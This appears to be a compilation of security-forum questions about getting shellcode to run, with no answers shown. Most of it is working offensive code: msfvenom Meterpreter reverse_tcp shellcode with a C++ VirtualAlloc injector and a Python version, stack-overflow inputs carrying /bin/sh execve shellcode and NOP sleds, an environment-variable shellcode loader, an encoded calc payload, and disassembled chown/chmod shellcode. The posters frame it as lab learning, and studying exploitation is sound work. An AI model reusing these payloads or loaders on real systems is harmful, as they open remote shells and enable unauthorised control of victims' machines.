Can’t inject meterpreter shellcode in c++ code

I want to inject meterpreter shellcode in a c++ program .

When i create .exe file in msfvenom i try it in my virtual machine (windows 7) and it works well but when i create shellcode and inject it in a c++ file the programe compile succesfully but crashes when i launche it in my VM

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f c -o main2.txt 

here i my c++ code (compiled in x64 debug mode with microsoft visual studio):

#include <iostream> #include <Windows.h> int main() { char shell[] =      "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"     "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"     "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"     "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"     "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"     "\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b"     "\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b"     "\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"     "\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1"     "\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45"     "\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b"     "\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"     "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"     "\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"     "\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00"     "\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"     "\x49\xbc\x02\x00\x11\x5c\xc0\xa8\xd0\x85\x41\x54\x49\x89\xe4"     "\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68"     "\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a"     "\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"     "\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5"     "\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba"     "\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5"     "\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"     "\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5"     "\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"     "\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"     "\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"     "\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"     "\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40"     "\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5"     "\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"     "\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"     "\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5";  void* exec = VirtualAlloc(0, sizeof shell, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(exec, shell, sizeof shell); ((void(*)())exec)();  return 0;  } 

here is the error:

the application was unable du start correctly : c000007b 

What is my mistake ? thanks for answers !

Exploiting a service on 32bit OS on a 64bit processor with ShellCode

Let’s theoretically assume I have an overflow vulnerability on a certain service I want to exploit. The service reside in 32bit Operating System on a 64bit Processor.

I’m attempting to wrap my head around the coding challenges in regards to the different architecture used on these layers.

Let’s also set aside ASLR, DEP, Rebase, etc. How would the exploit be coded in terms of architecture compatibility if I am to use a shellcode?

Cannot execute shellcode using buffer overflow

As a home exercise I’m trying to achieve buffer overflow attack by running a simple char array program that stores the input argument in the program stack and then overflowing that stack with long enough input so that EIP gets overwritten with one of the NOP instructions and then it would slide to the shellcode and execute it.

I’m currently running Ubuntu 16.04 32-bit in Virtualbox, with kernel ASLR set to disabled.

My C code:

#include <stdio.h> #include <string.h>  int main(int argc, char **argv) {   char buffer[500]   strcpy(buffer, argv[1]);   printf("%s\n", buffer);   return 0; } 

I compiled the code with options: -z execstack -fno-stack-protector

When I’m trying to execute the code in gdb using some bash code to generate the input, I manage to change the register value to the one containing the NOPs but the code just throws segmentation fault and I am unable to execute the shellcode.

I started with 504 byte input, 476 NOPs + 24 shellcode + 4x 0x45 bytes.

enter image description here

I was able to find my input in the memory. I took the address somewhere between the NOPs (0xbfffed60).

To overwrite the ESP register, I grew the total input length to 508 bytes, which consisted of: 476 NOPs + 24 shellcode + 2x memory address (0xbfffed60, with bytes in inverted order \x60\xed\xff\xbf).

When I run the code with that input, I’m just receiving segmentation fault and not getting the shellcode to execute.

enter image description here

It seems to go in the exact spot where I’m telling it to go but it does not execute the NOPs nor the shellcode.

What shellcode is this?

From my understanding this does a chown(NULL) then chmod 3565
and lastly a SYS_exit

the code is from here

                 jmp     short loc_23   sub_4                             mov     eax, 0B6h                  pop     ebx             ; pathname                  xor     ecx, ecx        ; owner                  mov     edx, ecx        ; group                  int     80h             ; LINUX - sys_chown                  mov     eax, 0Fh                  mov     ecx, 0DEDh      ; mode                  int     80h             ; LINUX - sys_chmod                  mov     eax, edx        ; 00 in eax                  mov     ebx, edx        ; 00 in ebx                  inc     eax             ; 01 in eax = sys_exit                  int     80h             ; LINUX - sys_exit   loc_23:                                                   call    sub_4 

EIP pointing to shellcode but shellcode is not executing?

I have successfully overwritten the EIP register (pointing to my shellcode) but the shellcode is not executing. I compiled with the command

gcc -g -fno-stack-protector -z execstack -no-pie vuln.c -o vuln  

Here’s the output of gdb-peda (attempt 1):

[----------------------------------registers-----------------------------------] EAX: 0x0  EBX: 0x0  ECX: 0xbffff2a5 ("//shh/bin13PS110\v", '0' <repeats 24 times>, "5277") EDX: 0xb7fba01c --> 0x0  ESI: 0xb7fb8000 --> 0x1d6d6c  EDI: 0xb7fb8000 --> 0x1d6d6c  EBP: 0x0  ESP: 0xbffff2a5 ("//shh/bin13PS110\v", '0' <repeats 24 times>, "5277") EIP: 0x6850c031 EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] Invalid $  PC address: 0x6850c031 [------------------------------------stack-------------------------------------] 0000| 0xbffff2a5 ("//shh/bin13PS110\v", '0' <repeats 24 times>, "5277") 0004| 0xbffff2a9 ("h/bin13PS110\v", '0' <repeats 24 times>, "5277") 0008| 0xbffff2ad --> 0x50e3896e  0012| 0xbffff2b1 --> 0xb0e18953  0016| 0xbffff2b5 --> 0x9080cd0b  0020| 0xbffff2b9 --> 0x90909090  0024| 0xbffff2bd --> 0x90909090  0028| 0xbffff2c1 --> 0x90909090  [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x6850c031 in ?? () gdb-peda$   run < <(python -c "print 'A'*17 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + '\x90'*24 + '\xbf\xff\xf2\xa5'[::-1]") 

Output of gdb-peda (attempt 2):

gdb-peda$   run < <(python -c "print '\x90'*25 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80NOOOOPPPPQQQQQQQ' + '\xbf\xff\xf2\xad'[::-1]") Starting program: /home/kali/Desktop/exploit-excersises/stack5 < <(python -c "print '\x90'*25 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80NOOOOPPPPQQQQQQQ' + '\xbf\xff\xf2\xad'[::-1]")  Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] EAX: 0x0  EBX: 0x0  ECX: 0xbffff2ad ("//shh/bin13PS110\vNOOOOPPPPQQQQQQQ5277") EDX: 0xb7fba01c --> 0x0  ESI: 0xb7fb8000 --> 0x1d6d6c  EDI: 0xb7fb8000 --> 0x1d6d6c  EBP: 0x0  ESP: 0xbffff2ad ("//shh/bin13PS110\vNOOOOPPPPQQQQQQQ5277") EIP: 0x6850c031 EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] Invalid $  PC address: 0x6850c031 [------------------------------------stack-------------------------------------] 0000| 0xbffff2ad ("//shh/bin13PS110\vNOOOOPPPPQQQQQQQ5277") 0004| 0xbffff2b1 ("h/bin13PS110\vNOOOOPPPPQQQQQQQ5277") 0008| 0xbffff2b5 --> 0x50e3896e  0012| 0xbffff2b9 --> 0xb0e18953  0016| 0xbffff2bd --> 0x4e80cd0b  0020| 0xbffff2c1 ("OOOOPPPPQQQQQQQ5277") 0024| 0xbffff2c5 ("PPPPQQQQQQQ5277") 0028| 0xbffff2c9 ("QQQQQQQ5277") [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x6850c031 in ?? () 

Disassembled main function:

gdb-peda$   disas main Dump of assembler code for function main:    0x08049162 <+0>:     lea    ecx,[esp+0x4]    0x08049166 <+4>:     and    esp,0xfffffff0    0x08049169 <+7>:     push   DWORD PTR [ecx-0x4]    0x0804916c <+10>:    push   ebp    0x0804916d <+11>:    mov    ebp,esp    0x0804916f <+13>:    push   ebx    0x08049170 <+14>:    push   ecx    0x08049171 <+15>:    sub    esp,0x40    0x08049174 <+18>:    call   0x804919e <>    0x08049179 <+23>:    add    eax,0x2e87    0x0804917e <+28>:    sub    esp,0xc    0x08049181 <+31>:    lea    edx,[ebp-0x48]    0x08049184 <+34>:    push   edx    0x08049185 <+35>:    mov    ebx,eax    0x08049187 <+37>:    call   0x8049030 <gets@plt>    0x0804918c <+42>:    add    esp,0x10    0x0804918f <+45>:    mov    eax,0x0    0x08049194 <+50>:    lea    esp,[ebp-0x8]    0x08049197 <+53>:    pop    ecx    0x08049198 <+54>:    pop    ebx    0x08049199 <+55>:    pop    ebp    0x0804919a <+56>:    lea    esp,[ecx-0x4]    0x0804919d <+59>:    ret 

Source code:

#include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h>  int main(int argc, char **argv) {   char buffer[64];    gets(buffer); } 

operating system:

Linux kali 5.4.0-kali3-686-pae #1 SMP Debian 5.4.13-1kali1 (2020-01-20) i686 GNU/Linux 

How could I get my shellcode to execute?

Executing shellcode in python format

So after running the command:

msfvenom -p windows/meterpreter/reverse_tcp lhost= lport=8080 -f py

I receive the output:

buf =  b"" buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" buf += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" buf += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" buf += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" buf += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" buf += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" buf += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" buf += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" buf += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" buf += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" buf += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68" buf += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff" buf += b"\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80" buf += b"\x6b\x00\xff\xd5\x6a\x0a\x68\x0a\x00\x00\x1f\x68\x02" buf += b"\x00\x1f\x90\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50" buf += b"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68" buf += b"\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08" buf += b"\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57" buf += b"\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b" buf += b"\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58" buf += b"\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68" buf += b"\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68" buf += b"\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff" buf += b"\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c" buf += b"\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01" buf += b"\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00" buf += b"\x53\xff\xd5" 

How could I execute this code inside of a python script?

Basic questions about shellcode

Is the hex code at the top of this source file the same as the assembly at the bottom, as in they do the same thing?

How can I convert assembly into hex like in this source code file? I frequently see it being used in payloads. I understand it is done to preserve space, bypass IDS among other reasons.

Example file from the shell storm website

Shellcode is jumped to and executed but runs into error

I am really at a loss trying to understand why a Metasploit Windows payload is indeed reached (see snapshot from Immunity below), executed (at least partially), but doesn’t pop a calc.exe at all.

The shellcode on its own, tested within a C wrapper, does work (snapshot attached).

The shellcode on the stack, although reached by Immunity, does not. I have put an “\xcc” before, to visualize that it indeed is positioned and about to be executed. The disassembly code looks dodgy to me… but again, it works on its own…


msf5 payload(windows/exec) > generate -b "\x00" -e x86/alpha_mixed -f c /*  * windows/exec - 448 bytes  *  * Encoder: x86/alpha_mixed  * VERBOSE=false, PrependMigrate=false, EXITFUNC=process,   * CMD=calc.exe  */ 

OS: Windows 7 64bits, DEP switched off.

Below is a picture of my shellcode about to be executed (with a couple of NOPs and a “\xcc” to break). Things seem to break as early as the 3rd line with “FSTENV”…

shellcode being executed

enter image description here

Actual shellcode in Python format:

"\x89\xe6\xd9\xc7\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x49" + \ "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" + \ "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" + \ "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" + \ "\x4b\x4c\x4d\x38\x4c\x42\x43\x30\x73\x30\x55\x50\x55\x30\x6b" + \ "\x39\x58\x65\x76\x51\x69\x50\x52\x44\x4c\x4b\x52\x70\x46\x50" + \ "\x4c\x4b\x63\x62\x74\x4c\x4c\x4b\x63\x62\x47\x64\x4c\x4b\x62" + \ "\x52\x47\x58\x74\x4f\x6c\x77\x61\x5a\x51\x36\x55\x61\x59\x6f" + \ "\x6c\x6c\x75\x6c\x51\x71\x61\x6c\x53\x32\x64\x6c\x55\x70\x4f" + \ "\x31\x58\x4f\x36\x6d\x55\x51\x5a\x67\x68\x62\x6a\x52\x66\x32" + \ "\x32\x77\x4c\x4b\x72\x72\x66\x70\x4e\x6b\x32\x6a\x77\x4c\x4e" + \ "\x6b\x72\x6c\x34\x51\x74\x38\x6d\x33\x63\x78\x45\x51\x38\x51" + \ "\x56\x31\x4c\x4b\x63\x69\x55\x70\x55\x51\x79\x43\x4c\x4b\x71" + \ "\x59\x65\x48\x6a\x43\x64\x7a\x42\x69\x6c\x4b\x46\x54\x6c\x4b" + \ "\x55\x51\x7a\x76\x54\x71\x4b\x4f\x6c\x6c\x4a\x61\x48\x4f\x36" + \ "\x6d\x37\x71\x39\x57\x65\x68\x79\x70\x50\x75\x4b\x46\x76\x63" + \ "\x31\x6d\x7a\x58\x55\x6b\x43\x4d\x57\x54\x34\x35\x49\x74\x52" + \ "\x78\x4c\x4b\x56\x38\x67\x54\x37\x71\x38\x53\x75\x36\x4e\x6b" + \ "\x44\x4c\x52\x6b\x6c\x4b\x73\x68\x55\x4c\x36\x61\x78\x53\x6c" + \ "\x4b\x46\x64\x6c\x4b\x65\x51\x38\x50\x6b\x39\x50\x44\x37\x54" + \ "\x35\x74\x31\x4b\x63\x6b\x73\x51\x76\x39\x51\x4a\x52\x71\x4b" + \ "\x4f\x69\x70\x43\x6f\x71\x4f\x61\x4a\x4c\x4b\x74\x52\x6a\x4b" + \ "\x4e\x6d\x71\x4d\x43\x5a\x66\x61\x4c\x4d\x4b\x35\x78\x32\x67" + \ "\x70\x47\x70\x35\x50\x66\x30\x33\x58\x64\x71\x6c\x4b\x72\x4f" + \ "\x6d\x57\x79\x6f\x6b\x65\x6d\x6b\x78\x70\x48\x35\x4f\x52\x71" + \ "\x46\x53\x58\x4e\x46\x6a\x35\x4f\x4d\x4d\x4d\x6b\x4f\x58\x55" + \ "\x75\x6c\x37\x76\x73\x4c\x54\x4a\x6f\x70\x69\x6b\x49\x70\x32" + \ "\x55\x45\x55\x6f\x4b\x52\x67\x62\x33\x50\x72\x50\x6f\x42\x4a" + \ "\x45\x50\x31\x43\x69\x6f\x7a\x75\x63\x53\x75\x31\x52\x4c\x30" + \ "\x63\x64\x6e\x32\x45\x61\x68\x51\x75\x35\x50\x41\x41" 

Failure to execute shellcode

I’m trying to understand exploits that hijack the execution flow. Before exploiting a buffer overflow vulnerability, I’m just trying to set an environment variable to my shellcode and jump to it. So, in the following code, Im trying to set an environment variable FLAG to my shellcode using the function setenv("FLAG",shellcode,1) which seems to be successful. Then, I’m getting the address of FLAG using getenv("FLAG"). However, when I jump to the address, it segfaults. I tried debugging the program and I could see my shellcode at the address returned by getenv("FLAG"). But execution stops at that address.

#include <unistd.h> #include <stdlib.h> #include <string.h> #include <stdio.h>  int main(void) {         char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";          int val = setenv("FLAG",shellcode, 1);         if(!val)         {                 printf("Address of Flag: 0x%lx\n", getenv("FLAG"));                 char* s = getenv("FLAG");                 int (*ret)() = (int(*)())s;                 ret();         }         else                 printf("Could not set FLAG - %d\n", val);         return 0; }